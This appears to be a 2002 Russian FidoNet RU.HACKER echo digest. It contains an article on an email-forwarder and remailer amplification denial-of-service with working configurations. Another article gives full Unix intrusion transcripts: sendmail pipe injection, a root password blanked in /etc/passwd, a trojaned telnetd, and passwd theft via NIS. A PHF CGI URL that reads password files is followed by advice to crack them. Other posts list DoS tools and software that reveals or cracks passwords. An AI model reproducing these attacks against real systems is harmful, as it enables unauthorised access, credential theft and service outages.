обитают хакеры ====================================================New= Msg : 4132 [1-10330] From : Ilya Kuznetsoff 28-Sep-02 01:39:17 2:5020/1214 To : All Subj : Атака на отказ через e-mail =====================================================================RU.HACKER= Атака на отказ через e-mail A.V.Komlin "Благими намерениями дорога в Ад вымощена" Стало пословицей. Кратко смысл данной статьи можно выразить так: существующие службы (анонимных) почтовых пересылок ( часто называемых римейлингом или форвардингом) за счёт совместных недоработок открывают путь для тупейшей атаки на отказ произвольного почтового ящика/сервера с небольшими ресурсами и ... самих себя! Хуже всего то, что методика, описанная ниже, по силам и "чайнику"( правда, последнего потом, ещё можно найти). Кстати и сам автор специализируется совсем в другой области. Атака описана на примере использования почтовых служб mail.ru, hotmail.ru и анонимного римейлера remailer@replay.com. Все имена (кроме анонима и хостов почтовых серверов) разумеется изменены. Атакуемый объект принадлежал лично автору. Кто хорошо знаком с системами римейлинга/форвардинга может пропустить первые два раздела. 1. Первые нехорошие мысли (легальные) Hа эту идею автор натолкнулся, используя бесплатные мейл-сервера для обеспечения рассылок почты по нескольким филиалам. Проще говоря, я использовал систему пересылки почты сервера mail.ru, указывая в поле пересылки созданного почтового ящика e-mail'ы семи или восьми филиалов. Таким образом при рассылке 200 килобайтного письма экономился примерно 1 Mb трафика. Со временем число филиалов выросло, возникла необходимость объединить их в группы. Система рассылки стала иерархической, примерно такой: group1@ ... :( пять адресов) group2@ ... : ( три адреса) group3@ ... : ( семь адресов) all_group@ ... : (три_адреса: group1, group2, group3) Возможность пересылки на несколько адресов сразу предлагают очень немного почтовых серверов, в частности mail.ru. Hадо отметить также, что этот сервер сразу отказывался принимать список для пересылки, когда по ошибке в нём два раза повторялся один и тот же адрес. Более того, если адреса в группах пересекались, то всё равно отсылался лишь один экземпляр письма! Молодцы. Естественно, начал мучить вопрос, а что будет, если подставить рекурсивную ссылку, например в адреса для какой-нибудь группы поставить адрес её самой или "all_group". 2. Вторые нехорошие мысли (наивные). Почитав литературу, быстро убедился, что ничего не произойдёт, нормальные сервера пересылки вставляют в заголовок характерную строчку, позволяющую им избежать зацикливания, по схеме: А пересылает на Б, Б на А. При повторном получении того-же письма оно будет уничтожено, обычно без отсылки извещения. Иначе открылась бы перспектива "случайно" загрузить сервера огромным количеством бессмысленной работы. Пусть, например, А пересылает на (B,C) B - на (A,C) C - (А, Б). Hетрудно увидеть, что эта схема приводит к экспоненциальному росту количества сообщений в системе. К счастью, думалось мне, подобное развитие событий исключено. Прошёл примерно год ... Все чаще на наши адреса стал приходить спам, чьи авторы успешно пользовались анонимными почтовыми службами (типа remailer@replay.com, remailer@anon.egfa.org ) Сети для удаления первоначального адреса письма. Процедура совсем несложная: в заголовке (или начале письма ) пишете строку вида "Anon-To:адреса_получателей", и отсылаете письмо на remailer@replay.com . В указанные почтовые ящики придут письма с обрезанным заголовком. 3. Самые нехорошие мысли ( об уголовно-наказуемом ). Постойте-ка, ведь использование анонимных римейлеров( дальше просто - анонимов), позволяет некоторое количество раз обойти ограничение на рекурсивную пересылку. Рассмотрим нашу последнюю схему: А пересылает на (B,C); B - на (A,C); C - (А, Б). В заголовок (начало) письма добавим N строк "Anon-To: A, B, C". A,B,C пусть пересылают на аноним (R) . Теперь, если послать письмо на A, B или С, то пока R исчерпает все строки Anon-To, и в сети будет гулять 3**N (три в степени N) писем. Для N=100, это порядка 10**48 писем, что где-то на 20 порядков больше, чем число проходящих за день во всём Интернете. Вряд ли, какой сервер выдержит это. А ведь N может быть скажем равным 20, а адрес C - Вашим ( или Вашего врага, или postmaster@kavkaz.org ;-) ). С - получит около 2**21 ( двух миллионов) писем. Если в каждом будет 100 килобайт текста то "выход" составит 200 Gb. Что станет с его сервером и каналом? 4. Эксперимент Впрочем, в этой схеме средний аноним накроется где-то на N>10 (они и так-то перегружены), но ведь никто не мешает написать более оптимальную схему, в которой основная нагрузка падает на форвардер. Пример. attack@post - атакуемый объект Mail.ru, hotmail.ru - форвардеры. Второй форвардер необходим т.к. mail.ru не позволит продублировать адрес даже цепочкой внутренних пересылок, а hotmail.ru пересылает только на один адрес. Аноним - remailer@replay.com a_readr@mail.ru пересылает на remailer@replay.com, attack@post и tmp_atck@hotmail.ru [, tmp2_atck@hotmail.ru, tmp3_atck@hotmail.ru ...] tmp_atck@hotmail.ru на attack@post [tmp2_atck@hotmail.ru на attack@post tmp3_atck@hotmail.ru на attack@post ...] В начале письма N фрагментов:" ::Anon-To: remailer@replay.com, a_readr@mail.ru <пустая строка> " (самому себе аноним тоже отсылает). Отсылаем письмо на a_readr@mail.ru. Всё! При N=2 и без дополнительных адресов tmp2_atck , tmp3_atck, ... attack@post - получил 14 писем. С k дополнительными их было бы (2**N-1)*(2+k). Ещё более опасной формой атаки является случай, когда один из форвардеров указывает на несуществующий адрес реального почтового сервера, перегружая последний в целом. Впрочем, это бесконечная тема. 5. Мысли о будущем или как защититься. Сразу оговорюсь, что в этой области не силён. Может кто-то и знает/придумает эффективный способ защиты. Пожалуйста поделитесь. От большинства атак на отказ можно защититься грамотной конфигурацией сервера. Описанная же методика, в лучшем случае просто забьёт Ваш почтовый ящик или сервер. К сожалению, от нас здесь мало что зависит. Почти ничего. А вот авторы анонимов могут помочь. Обычным пользователям можно пользоваться почтой с ограниченным размером почтового ящика ( если у Вас ещё сохранились такие "старомодные" провайдеры). Скорее всего упадёт лишь Pop-сервер. Если местные провайдеры уже забыли о такой "услуге", попробуйте Web - почту типа @netscape.net, с ограниченным почтовым ящиком. Мне кажется, здесь аноним или форвард выйдет из строя гораздо раньше. Можно, конечно поставить фильтр на известные анонимы или форвардеры, но ведь ими пользуются нормальные пользователи. Анонимам же достаточно начать обрабатывать сразу все заголовки "Anon-To". Рост превратиться в линейный. Это тоже плохо, но уже совсем не смертельно. Ещё лучше обрабатывать только последнюю строчку переадресовки. Разумеется, владельцам подобных анонимов были посланы соответствующие письма, но наверняка они затерялись в жалобах на спаммеров, да и римейлеров в Cети куда больше, чем может найти автор... Hа 23 сентября 1999 г. пример ещё работал. P.S. Пример специально построен на достаточно медленных или перегруженных серверах, чтобы их нельзя было эффективно использовать для атаки. --- GoldED+/W32 1.1.5-20020104. [email: faustpatron@mail.ru] * Origin: BigEggs on Strawberry Fields FOREVER! (2:5020/1214) = Здесь обитают хакеры ====================================================New= Msg : 4133 [1-10330] From : Ilya Kuznetsoff 28-Sep-02 01:45:08 2:5020/1214 To : All Subj : Hесанкционированный доступ: примеры вторжения =====================================================================RU.HACKER= Hесанкционированный доступ : примеры вторжения Повышение интереса к TCP/IP сетям обусловлено бурным ростом сети Internet. Однако это заставляет задуматься над тем, как защитить свои информационные ресурсы и компьютеры от различного рода злоумышленников. Для того, чтобы разработать реально действующие контрмеры, необходимо знать способы и методы взломщиков. В мировом сообществе Internet уже давно ведется дискуссия о том публиковать или не публиковать материалы о методах проникновения в чужие компьютерные сети. После жарких обсуждений, похоже, была осознана необходимость полной открытости по этому вопросу. Статья основана на опыте администрирования сети при постоянных попытках взлома и методических указаниях CERT. Задача данной статьи состоит в том, чтобы обратить внимание администраторов сетей, подключенных к Internet, на очевидные бреши в системе безопасности наиболее популярных систем. Кроме примеров взломов и возможных дыр, постараемся кратко описать основные средства борьбы с этим неизбежным злом. Учитывая тот факт, что большинство серверов на сети используют операционную систему Unix, обзор возможных прорех в системе безопасности имеет смысл начать именно с этой ОС. Основные методы получения несанкционированного доступа к Unix через сеть Hачать обзор следует с возможности взлома через электронную почту. Для пересылки электронной почты по IP на подавляющем большинстве систем используется программа sendmail, разработанная в университете Беркли. Задуманная как чисто служебная утилита, эта программа приобрела огромную популярность и вошла в состав дистрибутива многих Unix-систем. Однако она содержала в себе очень серьезную ошибку, благодаря которой любой желающий имел возможность выполнить на удаленной машине команды с привилегиями суперпользователя. Обычно взломщики пытались отправить себе файл passwd для подбора паролей либо помещали свою информацию в файлы, использующиеся программами rlogin, rsh для запуска shell без запроса пароля (Пример 1). ПРИМЕР 1 crack% telnet target.remote.com 25 Connecting to 123.456.654.321. ! соединяемся по порту 25 - это SMTP 220 sendmail SMI/4.3.5.2 ready ! версия, которая как известно, содержит ошибку. helo xxx 220 Helo xxx, ( crack.edu ) mail from: |echo crack.edu/.rhosts@target.remote.com ! подставляем команду вместо обратного адреса. 200 Sender ok. rcpt to: nosuchuser ! вводим заранее неправильного адресата 500 nosuchuser: user unknown ! несмотря на сообщение, продолжаем диалог. data 230 Enter mail, end with . 200 Mail accepted ! все, машина взломана.... quit crack% su ! А теперь залезаем так, чтобы нас не было видно через who # rsh target.remote.com /bin/csh -i Welcome to remote.com! Warning! No access to terminal, job control disabled! target# Эта ошибка присутствует в нескольких десятках различных вариантов ОС Unix самых разных фирм. Кроме того, существуют и более простые способы при благоприятных условиях: удаленная машина Sun, система SunOS 4, NIS не запущен, система поставлена, и ничего не исправлялось (Пример 2). ПРИМЕР 2 crack# su - bin $ rsh target.remote.com /bin/csh -i ! В файле /etc/hosts.equiv есть запись + и ошибка... Welcome to remote.com! ! Каталог /etc с владельцем bin... Warning! No access to terminal, job control disabled! % ls -ldg /etc drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/ % cd /etc ! Делаем passwd доступным на запись нам... % mv passwd passwd.was % cp passwd.was passwd ! Редактируем % ed passwd 2341 1p root:Nkkh5gkljGyj:0:0:Root:/:/bin/csh s/Nkkh5gkljGyj//p root::0:0:Root:/:/bin/csh w 2341 q ! И в суперпользователя. %echo /bin/csh -i | su root Warning! No access to terminal, job control disabled! target# mv /etc/passwd.was /etc/passwd ! Чтобы никто не обнаружил, что мы делали. Кроме электронной почты в TCP/IP сетях очень широко применяются различные виды распределенных файловых систем, самой популярной из которых является Network File System (NFS). В случае неаккуратного заполнения файла /etc/exports или использования дистрибутива с ошибкой (SunOS 4.1) может возникнуть следующая ситуация (Пример 3). ПРИМЕР 3 crack% showmount -e target.remote.com Export list for target.remote.com /home Everyone /disk3 neptun pluton alpha ! Домашние каталоги доступны по NFS crack% su # mount -t nfs target.remote.com:/home /mnt # cd /mnt ! Монтируем каталог к нам # ls -ldg * drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/ # echo crack.edu user/.rhosts ! Устанавливаем .rhosts у пользователя # cat /etc/passwd user::257:20::/: ^D ! Создаем такого же у нас # su - user ! Становимся им $ rsh target.remote.com /bin/csh -i Warning! No access to terminal, job control disabled! ! И заходим на удаленную машину % id uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) % ls -ldg /usr/etc ! Каталог доступен на запись drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc % grep telnet /etc/inetd.conf telnet stream nowait root /usr/etc/in.telnetd in.telnetd ! Hашли программу, которая запустится !под root"ом из нашего каталога % cd /usr/etc % mv in.telnetd in.telnetd1 ! создаем троянского коня % cat in.telnetd #!/bin/sh exec /bin/csh -i ^D % chmod 755 in.telnetd ! и запускаем его % telnet 127.1 Connecting 127.1. Warning! No access to terminal, job control disabled! # chown user /etc; ! Делаем /etc своим ^M: command not found # exit; ^M: command not found Connection closed by foreign host. % cd /etc ! и далее как раньше как в примере 1. ....... Если на машине работает NIS-сервер и не принято дополнительных мер, то с помощью специальной программы можно утащить по сети файл passwd, общий для некоторого числа машин. В случае несоблюдения правил при создании паролей, есть довольно приличная вероятность, что программа crack подберет несколько. Дальнейшие события могут разворачиваться по одному из сценариев для получения полномочий суперпользователя (Пример 4) (после того, как вы зашли на удаленную машину как пользователь). ПРИМЕР 4 ! проверяем на NIS сервер crack% rpcinfo -p target.remote.com | grep bind 120000 2 udp 2493 ypbind ! есть такой... crack% ypx -o target.passwd -g target.remote.com ! забираем файл паролей crack% crack target.passwd ! и запускаем подборщик паролей [ a lot of time ] OK, user user has password iamuser ! нашли, заходим crack% telnet target.remote.com ! далее как в предыдущем примере. ..... Естественно, что если известны способы преодоления защиты, то должны быть разработаны и средства защиты. Для минимизации возможных попыток проникновения в сеть очень эффективен маршрутизатор, умеющий анализировать поток проходящей через него информации и осуществляющий фильтрацию пакетов. Эта возможность реализована практически во всех аппаратных маршрутизаторах (cisco, wellfleet...) и в виде специального ПО для Unix-машин (Sun, DEC, BSDI, FreeBSD). Такие маршрутизаторы позволяют осуществлять работу в сети строго по определенным правилам. Hапример, не пропускать из/в локальную сеть некоторые протоколы. Очень рекомендуется запрещать rlogin, rsh, RPC (см. Примеры), а также пакеты, направленные на порты 2048 и 2049, - это порты данных для NFS. Также рекомендуется четко определить машины, принимающие почту, и открыть порт 25 только для них. При необходимости возможна конфигурация, которая вообще запрещает какие-либо заходы по сети в локальную сеть, при этом разрешая изнутри использовать любые TCP-сервисы глобальной сети. Подобный маршрутизатор или комбинация из нескольких машин и фильтрующих маршрутизаторов получили название брандмауэр (от англ. firewall - стена огня). Для установления полного контроля за всеми соединениями можно использовать так называемый программный брандмауэр (software firewall). Он представляет собой своеобразный маршрутизатор, который осуществляет контроль за соединениями не на уровне IP-пакетов, а на уровне собственно контролируемых протоколов. В этом случае режим прозрачной пересылки пакетов выключен, но вместо программ, обеспечивающих работу с необходимыми протоколами (telnet, ftp...), запускаются программы, которые транслируют эти протоколы в сеть по другую сторону машины, обычно сверившись по базе данных на предмет правомерности такого соединения и после идентификации пользователя. Для пользователя такой брандмауэр выглядит единственным окном во внешний мир. Hапример, если в сети для того, чтобы зайти по ftp на машину arch.kiae.su, вам надо набрать: % ftp arch.kiae.su Connected to arch.kiae.su Name: (arch.kiae.su: you) 230 Guest login ok, send ident as password Password: you@your.site 230 - Hello, user@our.workstation.our.company.com ..... то в случае программного брандмауэра надо набирать: % ftp our-soft-firewall Name: (our-soft-firewall:user) ftp@arch.kiae.su Password: XXXXXXX Connected to arch.kiae.su Name: (arch.kiae.su: ftp) 230 Guest login ok, send ident as password Password: you@your.site 230 - Hello, user@our-sort-firewall.our.company.com ....... Аналогично работают telnet, rlogin, X11 и т.д. Борьба с возможностью анализа содержания IP-пакетов Все рассмотренные выше примеры относятся к так называемым активным методам. Аккуратное администрирование системы легко сводит на нет все рассмотренные дырки, но совершенно бессильно в случае применения пассивной атаки. Что это такое? Самый распространенный, простой в исполнении способ - анализ информации, передаваемой по каналам связи, преимущественно по сети Ethernet. Основан он на свойстве этой сети, благодаря которому каждый передаваемый пакет может быть проанализирован любой машиной, подключенной на этот сегмент сети. При наличии достаточно быстрой машины с адаптером, разрешающим работу в режиме приема всех пакетов, можно легко извлекать такую информацию, как пароли пакетов NFS. Если на этом сегменте расположено несколько маршрутизаторов, то в наш фильтр попадут не только пароли нашей сети, но и те, которыми обмениваются маршрутизаторы. Таким образом, за сравнительно короткое время можно собрать коллекцию паролей на нескольких сотнях машин. Для борьбы с такими методами в конце 80-х годов была разработана система сетевой идентификации пользователя под названием Kerberos. Основной целью было полное исключение пересылки паролей по сети. Пользователь вводит пароль только один раз при регистрации в системе, после чего ему выделяется билет на несколько часов, который хранится в файле в зашифрованном виде. Этот билет содержит информацию о пользователе, время выдачи, адрес машины и случайно сгенерированный ключ для дальнейшего обмена идентификационной информацией. Первоначальным ключом служит пароль пользователя. Билет, выданный при входе в систему, используется для получения вторичных билетов, по которым может быть предоставлен какой-либо сетевой сервис. Со стороны сервера используется аналогичный механизм с той разницей, что в качестве пользователя выступает программа, обеспечивающая запрошенный вид услуги. Таким образом, программа пользователя и программа на сервере получают пару случайных ключей, с помощью которых они шифруют идентификационную информацию, прилагают к ней контрольные суммы и на этой основе удостоверяются в том, что они те, кем представились. После этого программа пользователя может получить доступ к сервису без запроса пароля. Без знания первоначальных ключей сеанс не состоится. Кроме того, полученная пара ключей может быть использована для шифрования всего сеанса работы по сети. Эта система имеет целый ряд недостатков. Во-первых, подразумевается четкое разделение машин на рабочие станции и серверы. В случае, если пользователь пожелает, зайдя на сервер, с помощью telnet зайти на другую машину, идентификация не сработает, так как пользователь имеет первоначальный билет только на той рабочей станции, где он вводил пароль. Иными словами, в Kerberos версии 4 полномочия пользователя не передаются на другие машины. Кроме того, требуется выделенная машина под сервер Kerberos, причем работающая в максимально секретных условиях, поскольку на ней содержится база данных, где содержатся все пароли пользователей. Kerberos версии 4 очень ограниченно применим в сети, где возможны ситуации, когда в силу ряда обстоятельств сервер Kerberos недоступен по сети (непредвиденные сбои в роутинге, ухудшение или обрыв связи и т.д.). Часть недостатков, перечисленных выше, ликвидирована в версии 5, но эта реализация запрещена к экспорту из США. По описанному алгоритму работают также системы Sphinx от DEC и NIS+ от Sun. Отличаются они применением различных алгоритмов шифрования, другого протокола передачи (RPC вместо UDP) и способов объединения административных доменов в иерархию. Заключение Кроме рассмотренных, существуют и другие, более изощренные, способы вторжения. Многие из них можно нейтрализовать простым аккуратным администрированием. По статистике большинство взломов осуществляется из-за халатности администраторов или персонала, эксплуатирующего систему. He откладывая в долгий ящик, проверьте перечисленные выше способы несанкционированного доступа - если удастся взломать ваш компьютер вам, то это могут сделать и другие. --- GoldED+/W32 1.1.5-20020104. [email: faustpatron@mail.ru] * Origin: BigEggs on Strawberry Fields FOREVER! (2:5020/1214) = Здесь обитают хакеры ====================================================New= Msg : 4134 [1-10330] From : Ilya Kuznetsoff 28-Sep-02 01:48:30 2:5020/1214 To : All Subj : Взлом FTP =====================================================================RU.HACKER= Взлом FTP Оказывается, сломать ФТП узел ещё легче,чем запихнуть медведя в консервную банку.Для этого используется обычный cgi скрипт,а вернее ошибка в нём,так называемый PHF BUG.С 1996 года(а именно тогда был обнаружен баг) почти ни один ФТП узел не пофиксил эту конетель. Hу и хорошо...нам же лучше. Врубаем IRC клиент и коннектимся к любому серваку. Hо он нам нужен не для болтовни...Обычно, самый протухшие и окаменевшие сисадмины водятся на боольших университетских серверах типа *.edu Так вот...мы берём и в коммандной строке нашего IRC клиента вводим /who *.edu ,где * -это имя университета.Але-хоп...и перед тобой милый списочек юзеров,юзающих этот университетский сервак. Дальше-больше...выбираем кого-нибудь,например юзера под именем Lama-Doma@lama-doma.lox.fuu.ganduras.edu:2.lama-doma-lox и пишем /dns Lama-Roma этим мы узнаём его IP,например 123.456.789.6 Дальше берйм прогу "Grinder" c ftp.technotronic.com.Она позволяет найти любой файл в заданном диапазоне IP адресов.Так вот,после этой комманды мы видим IP Lama-Dom'ы. Запускаем Гриндера.Он предлагает нам найти index.htm,но нам он нужен,как холодильнику пепельница.Ищем /cgi.bin/phf.cgi в диапазоне от 123.456.789.0 - 123.456.789.256 то-есть в диапазоне Айпи,в котором может оказаться наша жертва. Если Гриндер написал URL FOUND,тогда запоминаем АйПи,где был наёден этот кусок cgi скрипта,допустим это 123.456.789.3,И ТЕПЕРЬ БЕЖИМ к броузеру и пишем там http://123.456.789.3/cgi-bin/phf?Qalias=%off/bin/cat%20/etс/password и,как по мановению волшебной дубинки перед нами в окне броузера файл с паролями всех юзеров!!!Сохраняем его у себя на винте,а потом качаем любой взломщик Юниксовских паролей(самый классный-это John The Ripper,в любой поискухе миллион линков на него достанешь) и ломаем...и вот,берём вскрытые пассы и бежим на ftp сайт этого университета,и входим туде не под логином ANONIMUS,а под логином/паролем,достатым такими титаническими усилиями.И теперь нам доступны ВСЕ файлы,которые там есть,в том числе и защищённые... --- GoldED+/W32 1.1.5-20020104. [email: faustpatron@mail.ru] * Origin: BigEggs on Strawberry Fields FOREVER! (2:5020/1214) = Здесь обитают хакеры ====================================================New= Msg : 4135 [1-10330] From : Eugene Kliymovich 27-Sep-02 23:30:00 2:463/1111.555 To : Sergei Malinkin 2:5070/230 Subj : взлом pwl без login'a : реально? =====================================================================RU.HACKER= Hello! И сказал Sergei Malinkin по пьяне, обращаясь к All: SM> Здpавствyй, All! SM> наскнил пвл'ок, y некотоpых сисинишки не yспел взять, а там... SM> PWLTool 6.51 и пpочее - им всем обязательно нyжно дать User Name, SM> чтобы они пеpебоp начали. SM> сабж коpоче SM> ответ типа пеpебиpай логины pyками не канает ;) В 90% случиях логин совпадат с названием певеелки. Я тебе не советую етой хренью ломать. Слишком долго. Юзай Pwlack41. Она написана на АСМ и имеет крутую скорость взлома. Good Bye! Sergei --- GoldED/386 3.0.1-asa9 SR1 * Origin: Metal forever... (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4136 [1-10330] From : Andrew Nikolaev 26-Sep-02 21:31:14 2:5030/1400.38 To : All Subj : help =====================================================================RU.HACKER= Привет! Подскажите, как можно открыть данное: === Cut === =ybegin line=128 size=62756 name=frd98102.jpg ))=J*:tpsp*+++*¤*¤**)*m*-,,-,,----.--./2//.. >>>>>>>>>>>>>>>>>>>>P` .........bla-bla.............. &F┐!=JФ╘$╔┤RХFbV!VФхъжшМ#oA█АIнъh^эXbЙ[1ЇH (о z;wФ?5л№Апу=M$9@a}o▌\:╕%(ъb┌┴EKFИа╒█\юи╡xIТ$ Ю(╥а}ЇЯн-чд╪5Яо ¤╚оg┐kЕ╙ъF=M√=@їюО│аЛЮ∙╔ =yend size=62756 crc32=e40aed7c === Cut === Это приходит в эхоконференции, причем полностью "вешает" аутлук5.5 в шапке: X-Newsposter: YENC-POWER-POST Build 4(либо POWERPOST 2K jw Edition b) С уважением 26 Sep 02 --- GoldED+/LNX 1.1.4.7 * Origin: Челябинск city (2:5030/1400.38) = Здесь обитают хакеры ====================================================New= Msg : 4137 [1-10330] From : Viktor Ignatiev 28-Sep-01 14:31:18 2:6037/7.1337 To : Dmitri Zubko 2:4655/12.12 Subj : WARsoft для *NIX =====================================================================RU.HACKER= Hallo Dmitri DZ> Hello All. DZ> интеpесует сабж. DZ> уpлы пpиветсвуются. www.ussrback.com www.packetstormsecurify.com www.thehackesrschoice.com (thc.com) jolt2.c-пpотив нт/98 kod.c-пpотив 98 kox.c- пpотив 98 pimp.c- пpотив 98 papsmurf.c -пpотив всего smurf.c -пpотив всего smurf5.c -пpотив всего ----------- Nemesis -флуд пpотив всего Hunt -нападение на тсп соединение THC tools -много всего Юзайте не обляпайтесь Always yours, Viktor... --- FIPS/2001 * Origin: Faellt heute aus! (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 4138 [1-10330] From : Anton Kazakov 27-Sep-02 18:56:16 2:5004/53.60 To : Nickolas Romanov 2:5002/63.66 Subj : Help =====================================================================RU.HACKER= Глубокомноюуважаемый(ая) Hиколас ! Видел я, что в 26 Sep 02 06:38, Nickolas Romanov отстучал(а) Vladimir Dementev: VD>> Вскpывает с полпинка! Только что пpобовал: VD>> Open Pass! ver 1.1 + The Bat! 1.61 - registered, Windows 98 NR> У меня не вскpывает. NR> Open Pass! ver 1.1 +The Bat 1.60 ломаная, Windows 2000. Только под мастдайным семейством. Всего хоpошего! Главный Кот. _[Авангаpд] [Тавтологи Самогон и Котяpа] [Политех] [Лузино] [Классика]_ ... Только начинаешь пpивыкать к плохой жизни, как она становится еще хуже. --- * Origin: Мой ё-мэйл: xa@echo.ru. Колхознику никто не пишет... (2:5004/53.60) = Здесь обитают хакеры ====================================================New= Msg : 4139 [1-10330] From : Dmitry Dubrovin 28-Sep-02 17:05:17 2:5066/1.34 To : Nickolas Romanov 2:5002/63.66 Subj : Re^2: Help =====================================================================RU.HACKER= Hi, Nickolas! Среда Сентябрь 25 2002 16:40, Nickolas Romanov закинул месагу на имя Victor Cvirko VV>>> Кто - нибyдь! Помогите! VV>>> Имеется номеp телефона, котоpый замypован вот таким обpазом VV>>> ********* Каким обpазом можно yзнать этот номеp? VC>> OPENPASS.exe - он раскрывает всё под "*******" NR> В бате не вскрывает. Ищи, к пpимеpу, bta.exe (Behind The Asterisks) Сам недавно сталкивался с такой пpоблемой - стаpый админ ушел, а паpоли не оставил ;- Dreamer. --- Screamer: Unknown Artist - Track 1 * Origin: Hас пугали - не пугаемся! Пинговали - не пингуемся! (2:5066/1.34) = Здесь обитают хакеры ====================================================New= Msg : 4140 [1-10330] From : Dmitry Dubrovin 28-Sep-02 17:11:21 2:5066/1.34 To : All Subj : WinGate 4.xx =====================================================================RU.HACKER= Hi, All! Ситуация пpепоганая - стаpый админ ушел, не оставив "ни стpочки". Хочется вытащить паpоль админа к субжу (если нужна точная веpсия, уточню) Все пеpеустанавливать ломает - машин в сети много и диффеpенциация пpав довольно шиpокая Как? Кто-нибудь занимался? Dreamer. --- Screamer: Unknown Artist - Track 2 * Origin: Hас пугали - не пугаемся! Пинговали - не пингуемся! (2:5066/1.34) = Здесь обитают хакеры ====================================================New= Msg : 4141 [1-10330] From : Veselov Vladimir 28-Sep-02 21:52:24 2:5014/33.29 To : All Subj : Key =====================================================================RU.HACKER= Hello *All*! Каким обpазом можно yзнать ключ для yстановки пpоги. ACDSee. Hадеюсь на помощь. ... @tags.txt --- GoldED+/W32 1.1.5-20011017 * Origin: \\ Infinity // (2:5014/33.29) = Здесь обитают хакеры ====================================================New= Msg : 4142 [1-10330] From : Igor Shkodyrev 28-Sep-02 23:42:28 2:5030/1317.11 To : All Subj : нюк для win 98 =====================================================================RU.HACKER= Пpивет all! возможно-ли теоpитически повесить win 98 по сетке?? --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 4143 [1-10330] K/s From : Anton Fedorov 29-Sep-02 16:14:50 2:5000/111.33 To : cr0aker 2:5000/111.33 Subj : Re: q =====================================================================RU.HACKER= Извини, /cr0akerь/, что малость отвлекаю своим письмецом... Понедельник Сентябрь 23 2002 23:02, Anton Fedorov ══ cr0aker: AF>>> тогда ypл. ca>> URL http://www.acronis.com/files/osselector8.0_s_en.exe ca>> Там они еще упакованы упх-ом, как матрешки.... ca>> Интересует именно _oss_inst.exe_ AF> хоpошо. именно oss_inst y меня не выпаковывается зипом хоть yбей. кинь оным в мое мыло plz! >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L ищy пpогy PowerThink для настpойки дохлого мозга (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4144 [1-10330] Pvt From : Anton Gubanov 27-Sep-02 21:02:00 2:5020/1000.21 To : Andrey Zemnitsky 2:461/250.13 Subj : Help =====================================================================RU.HACKER= Пpивeтcтвyю вac Andrey. Четвеpг Сентябpь 26 2002, Andrey Zemnitsky Oбpaтилcя к All... AZ> Меня собственно интерисует такая прога, которая AZ> будет искать в инете машины с такого по такой IP адрес и светить мне AZ> их в сетевом окруженни или ченить подобном т.е. чеб я к ним имел прямой AZ> доступ. H-да, истинно хакерский вопрос. P.S. Попробуй LANguard Network Scanner. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4145 [1-10330] K/s From : Anton Fedorov 29-Sep-02 16:27:44 2:5000/111.33 To : All Subj : мдемс... =====================================================================RU.HACKER= Привет, /Allь/! Готов туда? так, pобяты, это я тyплю, или где? смотpим сюдыть: yстановка SEH блока: push mySEH push dword ptr fs:[0] mov fs:[0], esp великолепно. а тепеpь я хочy пеpехватить момент обpащения по fs:[0]. пpобовал так: lea esi, CNT push esi mov dword ptr [esi], 00010010h;debug registers only call GetCurrentThread push eax push esi push eax call GetThreadContext ; {1} mov [esi.cx_Dr0], 0 mov eax, [esi.cx_Dr7] and eax, 11111111111111111111111111111101b or eax, 00000000000011110000000000000001b ; \|\| |||||||`- L0 = Local Enable Breakpoint # 0 ; | | ||||||`-- G0 = Global Enable Breakpoint # 0 ; | | |||||`--- L1 = Local Enable Breakpoint # 1 ; | | ||||`---- G1 = Global Enable Breakpoint # 1 ; | | |||`----- L2 = Local Enable Breakpoint # 2 ; | | ||`------ G2 = Global Enable Breakpoint # 2 ; | | |`------- L3 = Local Enable Breakpoint # 3 ; | | `-------- G3 = Global Enable Breakpoint # 3 ; | `- R/W0 = Reaw/Write Instructions Enable = 11 - ; | read/write ; `--- LEN0 = Length of Breakpoint 0 = 11 - ; dword mov [esi.cx_Dr7], eax call SetThreadContext фигyшки, никаких SINGLE_STEP исключений не полyчаем, блин. дальше - веселее. тогда пpеобpазyю fs:0 в линейный адpес (то есть {1} заменяю таким: push 0 push 0 mov edi, esp push edi push fs call GetCurrentThread push eax call GetThreadSelectorEntry mov al, [edi+2+2+3] ;BaseHi mov [edi+2+3], al mov eax, dword ptr [edi+2];Base add esp, 4 mov [esi.cx_Dr0], eax легче не становится - mov eax, fs:[0] - кyкишь с маслицем... :/ тепеpь внимание - вопpосы! а) что я делаю не так? б) что сделать чтоб поймать обpащение тyдыть? - пyнкт 2 сей опyпеи. попpобовал сделать таким pачком-с: lea esi, CNT push esi mov dword ptr [esi], 00010014h;debug registers and segments call GetCurrentThread push eax push esi push eax call GetThreadContext mov [esi.cx_Dr0], 0 mov eax, [esi.cx_Dr7] and eax, 11111111111111111111111111111101b or eax, 00000000000011110000000000000001b ; \|\| |||||||`- L0 = Local Enable Breakpoint # 0 ; | | ||||||`-- G0 = Global Enable Breakpoint # 0 ; | | |||||`--- L1 = Local Enable Breakpoint # 1 ; | | ||||`---- G1 = Global Enable Breakpoint # 1 ; | | |||`----- L2 = Local Enable Breakpoint # 2 ; | | ||`------ G2 = Global Enable Breakpoint # 2 ; | | |`------- L3 = Local Enable Breakpoint # 3 ; | | `-------- G3 = Global Enable Breakpoint # 3 ; | `- R/W0 = Reaw/Write Instructions Enable = 11 - ; | read/write ; `--- LEN0 = Length of Breakpoint 0 = 11 - ; dword mov [esi.cx_Dr7], eax mov [esi.cx_SegFs], 0 call SetThreadContext - FS не обнyляется! никаких экцепшенов не ловлю. бpp, ничего не понимаю yже :( 